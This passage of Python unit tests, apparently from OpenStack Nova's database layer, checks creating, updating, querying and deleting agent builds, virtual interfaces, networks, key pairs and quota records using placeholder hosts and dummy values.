agent_build = db.agent_build_create(self.ctxt, {})
self.assertEqual(1, len(db.agent_build_get_all(self.ctxt)))
db.agent_build_destroy(self.ctxt, agent_build.id)
self.assertEqual(0, len(db.agent_build_get_all(self.ctxt)))
def test_agent_build_update(self):
agent_build = db.agent_build_create(self.ctxt, {'os': 'HaikuOS'})
db.agent_build_update(self.ctxt, agent_build.id, {'os': 'ReactOS'})
self.assertEqual('ReactOS', db.agent_build_get_all(self.ctxt)[0].os)
def test_agent_build_destroy_destroyed(self):
agent_build = db.agent_build_create(self.ctxt, {})
db.agent_build_destroy(self.ctxt, agent_build.id)
self.assertRaises(exception.AgentBuildNotFound,
db.agent_build_destroy, self.ctxt, agent_build.id)
def test_agent_build_update_destroyed(self):
agent_build = db.agent_build_create(self.ctxt, {'os': 'HaikuOS'})
db.agent_build_destroy(self.ctxt, agent_build.id)
self.assertRaises(exception.AgentBuildNotFound,
db.agent_build_update, self.ctxt, agent_build.id, {'os': 'OS/2'})
def test_agent_build_exists(self):
values = {'hypervisor': 'kvm', 'os': 'FreeBSD',
'architecture': arch.X86_64}
db.agent_build_create(self.ctxt, values)
self.assertRaises(exception.AgentBuildExists, db.agent_build_create,
self.ctxt, values)
def test_agent_build_get_all_by_hypervisor(self):
values = {'hypervisor': 'kvm', 'os': 'FreeBSD',
'architecture': arch.X86_64}
created = db.agent_build_create(self.ctxt, values)
actual = db.agent_build_get_all(self.ctxt, hypervisor='kvm')
self._assertEqualListsOfObjects([created], actual)
class VirtualInterfaceTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(VirtualInterfaceTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.instance_uuid = db.instance_create(self.ctxt, {})['uuid']
values = {'host': 'localhost', 'project_id': 'project1'}
self.network = db.network_create_safe(self.ctxt, values)
def _get_base_values(self):
return {
'instance_uuid': self.instance_uuid,
'address': 'fake_address',
'network_id': self.network['id'],
'uuid': str(stdlib_uuid.uuid4())
}
def mock_db_query_first_to_raise_data_error_exception(self):
self.mox.StubOutWithMock(query.Query, 'first')
query.Query.first().AndRaise(db_exc.DBError())
self.mox.ReplayAll()
def _create_virt_interface(self, values):
v = self._get_base_values()
v.update(values)
return db.virtual_interface_create(self.ctxt, v)
def test_virtual_interface_create(self):
vif = self._create_virt_interface({})
self.assertIsNotNone(vif['id'])
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at', 'uuid']
self._assertEqualObjects(vif, self._get_base_values(), ignored_keys)
def test_virtual_interface_create_with_duplicate_address(self):
vif = self._create_virt_interface({})
self.assertRaises(exception.VirtualInterfaceCreateException,
self._create_virt_interface, {"uuid": vif['uuid']})
def test_virtual_interface_get(self):
vifs = [self._create_virt_interface({'address': 'a'}),
self._create_virt_interface({'address': 'b'})]
for vif in vifs:
real_vif = db.virtual_interface_get(self.ctxt, vif['id'])
self._assertEqualObjects(vif, real_vif)
def test_virtual_interface_get_by_address(self):
vifs = [self._create_virt_interface({'address': 'first'}),
self._create_virt_interface({'address': 'second'})]
for vif in vifs:
real_vif = db.virtual_interface_get_by_address(self.ctxt,
vif['address'])
self._assertEqualObjects(vif, real_vif)
def test_virtual_interface_get_by_address_not_found(self):
self.assertIsNone(db.virtual_interface_get_by_address(self.ctxt,
"i.nv.ali.ip"))
def test_virtual_interface_get_by_address_data_error_exception(self):
self.mock_db_query_first_to_raise_data_error_exception()
self.assertRaises(exception.InvalidIpAddressError,
db.virtual_interface_get_by_address,
self.ctxt,
"i.nv.ali.ip")
def test_virtual_interface_get_by_uuid(self):
vifs = [self._create_virt_interface({"address": "address_1"}),
self._create_virt_interface({"address": "address_2"})]
for vif in vifs:
real_vif = db.virtual_interface_get_by_uuid(self.ctxt, vif['uuid'])
self._assertEqualObjects(vif, real_vif)
def test_virtual_interface_get_by_instance(self):
inst_uuid2 = db.instance_create(self.ctxt, {})['uuid']
vifs1 = [self._create_virt_interface({'address': 'fake1'}),
self._create_virt_interface({'address': 'fake2'})]
# multiple nic of same instance
vifs2 = [self._create_virt_interface({'address': 'fake3',
'instance_uuid': inst_uuid2}),
self._create_virt_interface({'address': 'fake4',
'instance_uuid': inst_uuid2})]
vifs1_real = db.virtual_interface_get_by_instance(self.ctxt,
self.instance_uuid)
vifs2_real = db.virtual_interface_get_by_instance(self.ctxt,
inst_uuid2)
self._assertEqualListsOfObjects(vifs1, vifs1_real)
self._assertEqualOrderedListOfObjects(vifs2, vifs2_real)
def test_virtual_interface_get_by_instance_and_network(self):
inst_uuid2 = db.instance_create(self.ctxt, {})['uuid']
values = {'host': 'localhost', 'project_id': 'project2'}
network_id = db.network_create_safe(self.ctxt, values)['id']
vifs = [self._create_virt_interface({'address': 'fake1'}),
self._create_virt_interface({'address': 'fake2',
'network_id': network_id,
'instance_uuid': inst_uuid2}),
self._create_virt_interface({'address': 'fake3',
'instance_uuid': inst_uuid2})]
for vif in vifs:
params = (self.ctxt, vif['instance_uuid'], vif['network_id'])
r_vif = db.virtual_interface_get_by_instance_and_network(*params)
self._assertEqualObjects(r_vif, vif)
def test_virtual_interface_delete_by_instance(self):
inst_uuid2 = db.instance_create(self.ctxt, {})['uuid']
values = [dict(address='fake1'), dict(address='fake2'),
dict(address='fake3', instance_uuid=inst_uuid2)]
for vals in values:
self._create_virt_interface(vals)
db.virtual_interface_delete_by_instance(self.ctxt, self.instance_uuid)
real_vifs1 = db.virtual_interface_get_by_instance(self.ctxt,
self.instance_uuid)
real_vifs2 = db.virtual_interface_get_by_instance(self.ctxt,
inst_uuid2)
self.assertEqual(len(real_vifs1), 0)
self.assertEqual(len(real_vifs2), 1)
def test_virtual_interface_get_all(self):
inst_uuid2 = db.instance_create(self.ctxt, {})['uuid']
values = [dict(address='fake1'), dict(address='fake2'),
dict(address='fake3', instance_uuid=inst_uuid2)]
vifs = [self._create_virt_interface(val) for val in values]
real_vifs = db.virtual_interface_get_all(self.ctxt)
self._assertEqualListsOfObjects(vifs, real_vifs)
class NetworkTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.network_* methods."""
def setUp(self):
super(NetworkTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_associated_fixed_ip(self, host, cidr, ip):
network = db.network_create_safe(self.ctxt,
{'project_id': 'project1', 'cidr': cidr})
self.assertFalse(db.network_in_use_on_host(self.ctxt, network.id,
host))
instance = db.instance_create(self.ctxt,
{'project_id': 'project1', 'host': host})
virtual_interface = db.virtual_interface_create(self.ctxt,
{'instance_uuid': instance.uuid, 'network_id': network.id,
'address': ip})
db.fixed_ip_create(self.ctxt, {'address': ip,
'network_id': network.id, 'allocated': True,
'virtual_interface_id': virtual_interface.id})
db.fixed_ip_associate(self.ctxt, ip, instance.uuid,
network.id)
return network, instance
def test_network_get_associated_default_route(self):
network, instance = self._get_associated_fixed_ip('host.net',
'192.0.2.0/30', '192.0.2.1')
network2 = db.network_create_safe(self.ctxt,
{'project_id': 'project1', 'cidr': '192.0.3.0/30'})
ip = '192.0.3.1'
virtual_interface = db.virtual_interface_create(self.ctxt,
{'instance_uuid': instance.uuid, 'network_id': network2.id,
'address': ip})
db.fixed_ip_create(self.ctxt, {'address': ip,
'network_id': network2.id, 'allocated': True,
'virtual_interface_id': virtual_interface.id})
db.fixed_ip_associate(self.ctxt, ip, instance.uuid,
network2.id)
data = db.network_get_associated_fixed_ips(self.ctxt, network.id)
self.assertEqual(1, len(data))
self.assertTrue(data[0]['default_route'])
data = db.network_get_associated_fixed_ips(self.ctxt, network2.id)
self.assertEqual(1, len(data))
self.assertFalse(data[0]['default_route'])
def test_network_get_associated_fixed_ips(self):
network, instance = self._get_associated_fixed_ip('host.net',
'192.0.2.0/30', '192.0.2.1')
data = db.network_get_associated_fixed_ips(self.ctxt, network.id)
self.assertEqual(1, len(data))
self.assertEqual('192.0.2.1', data[0]['address'])
self.assertEqual('192.0.2.1', data[0]['vif_address'])
self.assertEqual(instance.uuid, data[0]['instance_uuid'])
self.assertTrue(data[0]['allocated'])
def test_network_create_safe(self):
values = {'host': 'localhost', 'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
self.assertEqual(36, len(network['uuid']))
db_network = db.network_get(self.ctxt, network['id'])
self._assertEqualObjects(network, db_network)
def test_network_create_with_duplicate_vlan(self):
values1 = {'host': 'localhost', 'project_id': 'project1', 'vlan': 1}
values2 = {'host': 'something', 'project_id': 'project1', 'vlan': 1}
db.network_create_safe(self.ctxt, values1)
self.assertRaises(exception.DuplicateVlan,
db.network_create_safe, self.ctxt, values2)
def test_network_delete_safe(self):
values = {'host': 'localhost', 'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
db.network_get(self.ctxt, network['id'])
values = {'network_id': network['id'], 'address': '192.168.1.5'}
address1 = db.fixed_ip_create(self.ctxt, values)['address']
values = {'network_id': network['id'],
'address': '192.168.1.6',
'allocated': True}
address2 = db.fixed_ip_create(self.ctxt, values)['address']
self.assertRaises(exception.NetworkInUse,
db.network_delete_safe, self.ctxt, network['id'])
db.fixed_ip_update(self.ctxt, address2, {'allocated': False})
network = db.network_delete_safe(self.ctxt, network['id'])
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.fixed_ip_get_by_address, self.ctxt, address1)
ctxt = self.ctxt.elevated(read_deleted='yes')
fixed_ip = db.fixed_ip_get_by_address(ctxt, address1)
self.assertTrue(fixed_ip['deleted'])
def test_network_in_use_on_host(self):
values = {'host': 'foo', 'hostname': 'myname'}
instance = db.instance_create(self.ctxt, values)
values = {'address': '192.168.1.5', 'instance_uuid': instance['uuid']}
vif = db.virtual_interface_create(self.ctxt, values)
values = {'address': '192.168.1.6',
'network_id': 1,
'allocated': True,
'instance_uuid': instance['uuid'],
'virtual_interface_id': vif['id']}
db.fixed_ip_create(self.ctxt, values)
self.assertTrue(db.network_in_use_on_host(self.ctxt, 1, 'foo'))
self.assertFalse(db.network_in_use_on_host(self.ctxt, 1, 'bar'))
def test_network_update_nonexistent(self):
self.assertRaises(exception.NetworkNotFound,
db.network_update, self.ctxt, 123456, {})
def test_network_update_with_duplicate_vlan(self):
values1 = {'host': 'localhost', 'project_id': 'project1', 'vlan': 1}
values2 = {'host': 'something', 'project_id': 'project1', 'vlan': 2}
network_ref = db.network_create_safe(self.ctxt, values1)
db.network_create_safe(self.ctxt, values2)
self.assertRaises(exception.DuplicateVlan,
db.network_update, self.ctxt,
network_ref["id"], values2)
def test_network_update(self):
network = db.network_create_safe(self.ctxt, {'project_id': 'project1',
'vlan': 1, 'host': 'test.com'})
db.network_update(self.ctxt, network.id, {'vlan': 2})
network_new = db.network_get(self.ctxt, network.id)
self.assertEqual(2, network_new.vlan)
def test_network_set_host_nonexistent_network(self):
self.assertEqual(0, db.network_set_host(
self.ctxt, 123456, 'nonexistent'))
def test_network_set_host_already_set(self):
values = {'host': 'example.com', 'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
self.assertEqual(0, db.network_set_host(
self.ctxt, network.id, 'new.example.com'))
def test_network_set_host_with_initially_no_host(self):
values = {'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
self.assertEqual(1, db.network_set_host(
self.ctxt, network.id, 'example.com'))
self.assertEqual('example.com',
db.network_get(self.ctxt, network.id).host)
def test_network_get_all_by_host(self):
self.assertEqual([],
db.network_get_all_by_host(self.ctxt, 'example.com'))
host = 'h1.example.com'
# network with host set
net1 = db.network_create_safe(self.ctxt, {'host': host})
self._assertEqualListsOfObjects([net1],
db.network_get_all_by_host(self.ctxt, host))
# network with fixed ip with host set
net2 = db.network_create_safe(self.ctxt, {})
db.fixed_ip_create(self.ctxt, {'host': host, 'network_id': net2.id})
db.network_get_all_by_host(self.ctxt, host)
self._assertEqualListsOfObjects([net1, net2],
db.network_get_all_by_host(self.ctxt, host))
# network with instance with host set
net3 = db.network_create_safe(self.ctxt, {})
instance = db.instance_create(self.ctxt, {'host': host})
db.fixed_ip_create(self.ctxt, {'network_id': net3.id,
'instance_uuid': instance.uuid})
self._assertEqualListsOfObjects([net1, net2, net3],
db.network_get_all_by_host(self.ctxt, host))
def test_network_get_by_cidr(self):
cidr = '192.0.2.0/30'
cidr_v6 = '2001:db8:1::/64'
network = db.network_create_safe(self.ctxt,
{'project_id': 'project1', 'cidr': cidr, 'cidr_v6': cidr_v6})
self._assertEqualObjects(network,
db.network_get_by_cidr(self.ctxt, cidr))
self._assertEqualObjects(network,
db.network_get_by_cidr(self.ctxt, cidr_v6))
def test_network_get_by_cidr_nonexistent(self):
self.assertRaises(exception.NetworkNotFoundForCidr,
db.network_get_by_cidr, self.ctxt, '192.0.2.0/30')
def test_network_get_by_uuid(self):
network = db.network_create_safe(self.ctxt,
{'project_id': 'project_1'})
self._assertEqualObjects(network,
db.network_get_by_uuid(self.ctxt, network.uuid))
def test_network_get_by_uuid_nonexistent(self):
self.assertRaises(exception.NetworkNotFoundForUUID,
db.network_get_by_uuid, self.ctxt, 'non-existent-uuid')
def test_network_get_all_by_uuids_no_networks(self):
self.assertRaises(exception.NoNetworksFound,
db.network_get_all_by_uuids, self.ctxt, ['non-existent-uuid'])
def test_network_get_all_by_uuids(self):
net1 = db.network_create_safe(self.ctxt, {})
net2 = db.network_create_safe(self.ctxt, {})
self._assertEqualListsOfObjects([net1, net2],
db.network_get_all_by_uuids(self.ctxt, [net1.uuid, net2.uuid]))
def test_network_get_all_no_networks(self):
self.assertRaises(exception.NoNetworksFound,
db.network_get_all, self.ctxt)
def test_network_get_all(self):
network = db.network_create_safe(self.ctxt, {})
network_db = db.network_get_all(self.ctxt)
self.assertEqual(1, len(network_db))
self._assertEqualObjects(network, network_db[0])
def test_network_get_all_admin_user(self):
network1 = db.network_create_safe(self.ctxt, {})
network2 = db.network_create_safe(self.ctxt,
{'project_id': 'project1'})
self._assertEqualListsOfObjects([network1, network2],
db.network_get_all(self.ctxt,
project_only=True))
def test_network_get_all_normal_user(self):
normal_ctxt = context.RequestContext('fake', 'fake')
db.network_create_safe(self.ctxt, {})
db.network_create_safe(self.ctxt, {'project_id': 'project1'})
network1 = db.network_create_safe(self.ctxt,
{'project_id': 'fake'})
network_db = db.network_get_all(normal_ctxt, project_only=True)
self.assertEqual(1, len(network_db))
self._assertEqualObjects(network1, network_db[0])
def test_network_get(self):
network = db.network_create_safe(self.ctxt, {})
self._assertEqualObjects(db.network_get(self.ctxt, network.id),
network)
db.network_delete_safe(self.ctxt, network.id)
self.assertRaises(exception.NetworkNotFound,
db.network_get, self.ctxt, network.id)
def test_network_associate(self):
network = db.network_create_safe(self.ctxt, {})
self.assertIsNone(network.project_id)
db.network_associate(self.ctxt, "project1", network.id)
self.assertEqual("project1", db.network_get(self.ctxt,
network.id).project_id)
def test_network_disassociate(self):
network = db.network_create_safe(self.ctxt,
{'project_id': 'project1', 'host': 'test.net'})
# disassociate project
db.network_disassociate(self.ctxt, network.id, False, True)
self.assertIsNone(db.network_get(self.ctxt, network.id).project_id)
# disassociate host
db.network_disassociate(self.ctxt, network.id, True, False)
self.assertIsNone(db.network_get(self.ctxt, network.id).host)
def test_network_count_reserved_ips(self):
net = db.network_create_safe(self.ctxt, {})
self.assertEqual(0, db.network_count_reserved_ips(self.ctxt, net.id))
db.fixed_ip_create(self.ctxt, {'network_id': net.id,
'reserved': True})
self.assertEqual(1, db.network_count_reserved_ips(self.ctxt, net.id))
class KeyPairTestCase(test.TestCase, ModelsObjectComparatorMixin):
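"""Tests for db.api.key_pair_* methods."""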
def setUp(self):
super(KeyPairTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _create_key_pair(self, values):
return db.key_pair_create(self.ctxt, values)
def test_key_pair_create(self):
param = {
'name': 'test_1',
'type': 'ssh',
'user_id': 'test_user_id_1',
'public_key': 'test_public_key_1',
'fingerprint': 'test_fingerprint_1'
}
key_pair = self._create_key_pair(param)
self.assertIsNotNone(key_pair['id'])
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id']
self._assertEqualObjects(key_pair, param, ignored_keys)
def test_key_pair_create_with_duplicate_name(self):
params = {'name': 'test_name', 'user_id': 'test_user_id',
'type': 'ssh'}
self._create_key_pair(params)
self.assertRaises(exception.KeyPairExists, self._create_key_pair,
params)
def test_key_pair_get(self):
params = [
{'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_2', 'user_id': 'test_user_id_2', 'type': 'ssh'},
{'name': 'test_3', 'user_id': 'test_user_id_3', 'type': 'ssh'}
]
key_pairs = [self._create_key_pair(p) for p in params]
for key in key_pairs:
real_key = db.key_pair_get(self.ctxt, key['user_id'], key['name'])
self._assertEqualObjects(key, real_key)
def test_key_pair_get_no_results(self):
param = {'name': 'test_1', 'user_id': 'test_user_id_1'}
self.assertRaises(exception.KeypairNotFound, db.key_pair_get,
self.ctxt, param['user_id'], param['name'])
def test_key_pair_get_deleted(self):
param = {'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'}
key_pair_created = self._create_key_pair(param)
db.key_pair_destroy(self.ctxt, param['user_id'], param['name'])
self.assertRaises(exception.KeypairNotFound, db.key_pair_get,
self.ctxt, param['user_id'], param['name'])
ctxt = self.ctxt.elevated(read_deleted='yes')
key_pair_deleted = db.key_pair_get(ctxt, param['user_id'],
param['name'])
ignored_keys = ['deleted', 'created_at', 'updated_at', 'deleted_at']
self._assertEqualObjects(key_pair_deleted, key_pair_created,
ignored_keys)
self.assertEqual(key_pair_deleted['deleted'], key_pair_deleted['id'])
def test_key_pair_get_all_by_user(self):
params = [
{'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_2', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_3', 'user_id': 'test_user_id_2', 'type': 'ssh'}
]
key_pairs_user_1 = [self._create_key_pair(p) for p in params
if p['user_id'] == 'test_user_id_1']
key_pairs_user_2 = [self._create_key_pair(p) for p in params
if p['user_id'] == 'test_user_id_2']
real_keys_1 = db.key_pair_get_all_by_user(self.ctxt, 'test_user_id_1')
real_keys_2 = db.key_pair_get_all_by_user(self.ctxt, 'test_user_id_2')
self._assertEqualListsOfObjects(key_pairs_user_1, real_keys_1)
self._assertEqualListsOfObjects(key_pairs_user_2, real_keys_2)
def test_key_pair_count_by_user(self):
params = [
{'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_2', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_3', 'user_id': 'test_user_id_2', 'type': 'ssh'}
]
for p in params:
self._create_key_pair(p)
count_1 = db.key_pair_count_by_user(self.ctxt, 'test_user_id_1')
self.assertEqual(count_1, 2)
count_2 = db.key_pair_count_by_user(self.ctxt, 'test_user_id_2')
self.assertEqual(count_2, 1)
def test_key_pair_destroy(self):
param = {'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'}
self._create_key_pair(param)
db.key_pair_destroy(self.ctxt, param['user_id'], param['name'])
self.assertRaises(exception.KeypairNotFound, db.key_pair_get,
self.ctxt, param['user_id'], param['name'])
def test_key_pair_destroy_no_such_key(self):
param = {'name': 'test_1', 'user_id': 'test_user_id_1'}
self.assertRaises(exception.KeypairNotFound,
db.key_pair_destroy, self.ctxt,
param['user_id'], param['name'])
class QuotaTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.quota_* methods."""
def setUp(self):
super(QuotaTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_quota_create(self):
quota = db.quota_create(self.ctxt, 'project1', 'resource', 99)
self.assertEqual(quota.resource, 'resource')
self.assertEqual(quota.hard_limit, 99)
self.assertEqual(quota.project_id, 'project1')
def test_quota_get(self):
quota = db.quota_create(self.ctxt, 'project1', 'resource', 99)
quota_db = db.quota_get(self.ctxt, 'project1', 'resource')
self._assertEqualObjects(quota, quota_db)
def test_quota_get_all_by_project(self):
for i in range(3):
for j in range(3):
db.quota_create(self.ctxt, 'proj%d' % i, 'resource%d' % j, j)
for i in range(3):
quotas_db = db.quota_get_all_by_project(self.ctxt, 'proj%d' % i)
self.assertEqual(quotas_db, {'project_id': 'proj%d' % i,
'resource0': 0,
'resource1': 1,
'resource2': 2})
def test_quota_get_all_by_project_and_user(self):
for i in range(3):
for j in range(3):
db.quota_create(self.ctxt, 'proj%d' % i, 'resource%d' % j,
j - 1, user_id='user%d' % i)
for i in range(3):
quotas_db = db.quota_get_all_by_project_and_user(self.ctxt,
'proj%d' % i,
'user%d' % i)
self.assertEqual(quotas_db, {'project_id': 'proj%d' % i,
'user_id': 'user%d' % i,
'resource0': -1,
'resource1': 0,
'resource2': 1})
def test_quota_update(self):
db.quota_create(self.ctxt, 'project1', 'resource1', 41)
db.quota_update(self.ctxt, 'project1', 'resource1', 42)
quota = db.quota_get(self.ctxt, 'project1', 'resource1')
self.assertEqual(quota.hard_limit, 42)
self.assertEqual(quota.resource, 'resource1')
self.assertEqual(quota.project_id, 'project1')
def test_quota_update_nonexistent(self):
self.assertRaises(exception.ProjectQuotaNotFound,
db.quota_update, self.ctxt, 'project1', 'resource1', 42)
def test_quota_get_nonexistent(self):
self.assertRaises(exception.ProjectQuotaNotFound,
db.quota_get, self.ctxt, 'project1', 'resource1')
def test_quota_reserve_all_resources(self):
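# Create real usage records for every reservable resource, then check
# that quota_reserve() reports matching in_use and reserved values.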
quotas = {}
deltas = {}
reservable_resources = {}
for i, resource in enumerate(quota.resources):
if isinstance(resource, quota.ReservableResource):
quotas[resource.name] = db.quota_create(self.ctxt, 'project1',
resource.name, 100)
deltas[resource.name] = i
reservable_resources[resource.name] = resource
usages = {'instances': 3, 'cores': 6, 'ram': 9}
instances = []
for i in range(3):
instances.append(db.instance_create(self.ctxt,
{'vcpus': 2, 'memory_mb': 3,
'project_id': 'project1'}))
usages['fixed_ips'] = 2
network = db.network_create_safe(self.ctxt, {})
for i in range(2):
address = '192.168.0.%d' % i
db.fixed_ip_create(self.ctxt, {'project_id': 'project1',
'address': address,
'network_id': network['id']})
db.fixed_ip_associate(self.ctxt, address,
instances[0].uuid, network['id'])
usages['floating_ips'] = 5
for i in range(5):
db.floating_ip_create(self.ctxt, {'project_id': 'project1'})
usages['security_groups'] = 3
for i in range(3):
db.security_group_create(self.ctxt, {'project_id': 'project1'})
usages['server_groups'] = 4
for i in range(4):
db.instance_group_create(self.ctxt, {'uuid': str(i),
'project_id': 'project1'})
reservations_uuids = db.quota_reserve(self.ctxt, reservable_resources,
quotas, quotas, deltas, None,
None, None, 'project1')
resources_names = reservable_resources.keys()
for reservation_uuid in reservations_uuids:
reservation = _reservation_get(self.ctxt, reservation_uuid)
usage = db.quota_usage_get(self.ctxt, 'project1',
reservation.resource)
self.assertEqual(usage.in_use, usages[reservation.resource],
'Resource: %s' % reservation.resource)
self.assertEqual(usage.reserved, deltas[reservation.resource])
self.assertIn(reservation.resource, resources_names)
resources_names.remove(reservation.resource)
self.assertEqual(len(resources_names), 0)
def test_quota_destroy_all_by_project(self):
reservations = _quota_reserve(self.ctxt, 'project1', 'user1')
db.quota_destroy_all_by_project(self.ctxt, 'project1')
self.assertEqual(db.quota_get_all_by_project(self.ctxt, 'project1'),
{'project_id': 'project1'})
self.assertEqual(db.quota_get_all_by_project_and_user(self.ctxt,
'project1', 'user1'),
{'project_id': 'project1', 'user_id': 'user1'})
self.assertEqual(db.quota_usage_get_all_by_project(
self.ctxt, 'project1'),
{'project_id': 'project1'})
for r in reservations:
self.assertRaises(exception.ReservationNotFound,
_reservation_get, self.ctxt, r)
def test_quota_destroy_all_by_project_and_user(self):
reservations = _quota_reserve(self.ctxt, 'project1', 'user1')
db.quota_destroy_all_by_project_and_user(self.ctxt, 'project1',
'user1')
self.assertEqual(db.quota_get_all_by_project_and_user(self.ctxt,
'project1', 'user1'),
{'project_id': 'project1',
'user_id': 'user1'})
self.assertEqual(db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'),
{'project_id': 'project1',
'user_id': 'user1',
'fixed_ips': {'in_use': 2, 'reserved': 2}})
for r in reservations:
self.assertRaises(exception.ReservationNotFound,
_reservation_get, self.ctxt, r)
def test_quota_usage_get_nonexistent(self):
self.assertRaises(exception.QuotaUsageNotFound, db.quota_usage_get,
self.ctxt, 'p1', 'nonexistent_resource')
def test_quota_usage_get(self):
_quota_reserve(self.ctxt, 'p1', 'u1')
quota_usage = db.quota_usage_get(self.ctxt, 'p1', 'resource0')
expected = {'resource': 'resource0', 'project_id': 'p1',
'in_use': 0, 'reserved': 0, 'total': 0}
for key, value in expected.iteritems():
self.assertEqual(value, quota_usage[key])
def test_quota_usage_get_all_by_project(self):
_quota_reserve(self.ctxt, 'p1', 'u1')
expected = {'project_id': 'p1',
'resource0': {'in_use': 0, 'reserved': 0},
'resource1': {'in_use': 1, 'reserved': 1},
'fixed_ips': {'in_use': 2, 'reserved': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project(
self.ctxt, 'p1'))
def test_quota_usage_get_all_by_project_and_user(self):
_quota_reserve(self.ctxt, 'p1', 'u1')
expected = {'project_id': 'p1',
'user_id': 'u1',
'resource0': {'in_use': 0, 'reserved': 0},
'resource1': {'in_use': 1, 'reserved': 1},
'fixed_ips': {'in_use': 2, 'reserved': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'p1', 'u1'))
def test_quota_usage_update_nonexistent(self):
self.assertRaises(exception.QuotaUsageNotFound, db.quota_usage_update,
self.ctxt, 'p1', 'u1', 'resource', in_use=42)
def test_quota_usage_update(self):
_quota_reserve(self.ctxt, 'p1', 'u1')
db.quota_usage_update(self.ctxt, 'p1', 'u1', 'resource0', in_use=42,
reserved=43)
quota_usage = db.quota_usage_get(self.ctxt, 'p1', 'resource0', 'u1')
expected = {'resource': 'resource0', 'project_id': 'p1',
'user_id': 'u1', 'in_use': 42, 'reserved': 43, 'total': 85}
for key, value in expected.iteritems():
self.assertEqual(value, quota_usage[key])
def test_quota_create_exists(self):
db.quota_create(self.ctxt, 'project1', 'resource1', 41)
self.assertRaises(exception.QuotaExists, db.quota_create, self.ctxt,
'project1', 'resource1', 42)
class QuotaReserveNoDbTestCase(test.NoDBTestCase):
"""Tests quota reserve/refresh operations using mock."""
def test_create_quota_usage_if_missing_not_created(self):
# Tests that QuotaUsage isn't created if it's already in user_usages.
resource = 'fake-resource'
project_id = 'fake-project'
user_id = 'fake_user'
session = mock.sentinel
quota_usage = mock.sentinel
user_usages = {resource: quota_usage}
with mock.patch.object(sqlalchemy_api, '_quota_usage_create') as quc:
self.assertFalse(sqlalchemy_api._create_quota_usage_if_missing(
user_usages, resource, None,
project_id, user_id, session))
self.assertFalse(quc.called)
def _test_create_quota_usage_if_missing_created(self, per_project_quotas):
# Tests that the QuotaUsage is created.
user_usages = {}
if per_project_quotas:
resource = sqlalchemy_api.PER_PROJECT_QUOTAS[0]
else:
resource = 'fake-resource'
project_id = 'fake-project'
user_id = 'fake_user'
session = mock.sentinel
quota_usage = mock.sentinel
with mock.patch.object(sqlalchemy_api, '_quota_usage_create',
return_value=quota_usage) as quc:
self.assertTrue(sqlalchemy_api._create_quota_usage_if_missing(
user_usages, resource, None,
project_id, user_id, session))
self.assertEqual(quota_usage, user_usages[resource])
# Now test if the QuotaUsage was created with a user_id or not.
if per_project_quotas:
quc.assert_called_once_with(
project_id, None, resource, 0, 0, None, session=session)
else:
quc.assert_called_once_with(
project_id, user_id, resource, 0, 0, None, session=session)
def test_create_quota_usage_if_missing_created_per_project_quotas(self):
self._test_create_quota_usage_if_missing_created(True)
def test_create_quota_usage_if_missing_created_user_quotas(self):
self._test_create_quota_usage_if_missing_created(False)
def test_is_quota_refresh_needed_in_use(self):
# Tests when a quota refresh is needed based on the in_use value.
for in_use in range(-1, 1):
# We have to set until_refresh=None otherwise mock will give it
# a value which runs some code we don't want.
quota_usage = mock.MagicMock(in_use=in_use, until_refresh=None)
if in_use < 0:
self.assertTrue(sqlalchemy_api._is_quota_refresh_needed(
quota_usage, max_age=0))
else:
self.assertFalse(sqlalchemy_api._is_quota_refresh_needed(
quota_usage, max_age=0))
def test_is_quota_refresh_needed_until_refresh_none(self):
quota_usage = mock.MagicMock(in_use=0, until_refresh=None)
self.assertFalse(sqlalchemy_api._is_quota_refresh_needed(quota_usage,
max_age=0))
def test_is_quota_refresh_needed_until_refresh_not_none(self):
# Tests different values for the until_refresh counter.
for until_refresh in range(3):
quota_usage = mock.MagicMock(in_use=0, until_refresh=until_refresh)
refresh = sqlalchemy_api._is_quota_refresh_needed(quota_usage,
max_age=0)
until_refresh -= 1
if until_refresh <= 0:
self.assertTrue(refresh)
else:
self.assertFalse(refresh)
self.assertEqual(until_refresh, quota_usage.until_refresh)
def test_refresh_quota_usages(self):
quota_usage = mock.Mock(spec=models.QuotaUsage)
quota_usage.in_use = 5
quota_usage.until_refresh = None
sqlalchemy_api._refresh_quota_usages(quota_usage, until_refresh=5,
in_use=6)
self.assertEqual(6, quota_usage.in_use)
self.assertEqual(5, quota_usage.until_refresh)
def test_calculate_overquota_no_delta(self):
deltas = {'foo': -1}
user_quotas = {'foo': 10}
overs = sqlalchemy_api._calculate_overquota({}, user_quotas, deltas,
{}, {})
self.assertFalse(overs)
def test_calculate_overquota_unlimited_quota(self):
deltas = {'foo': 1}
project_quotas = {}
user_quotas = {'foo': -1}
project_usages = {}
user_usages = {'foo': 10}
overs = sqlalchemy_api._calculate_overquota(
project_quotas, user_quotas, deltas, project_usages, user_usages)
self.assertFalse(overs)
def _test_calculate_overquota(self, resource, project_usages, user_usages):
deltas = {resource: 1}
project_quotas = {resource: 10}
user_quotas = {resource: 10}
overs = sqlalchemy_api._calculate_overquota(
project_quotas, user_quotas, deltas, project_usages, user_usages)
self.assertEqual(resource, overs[0])
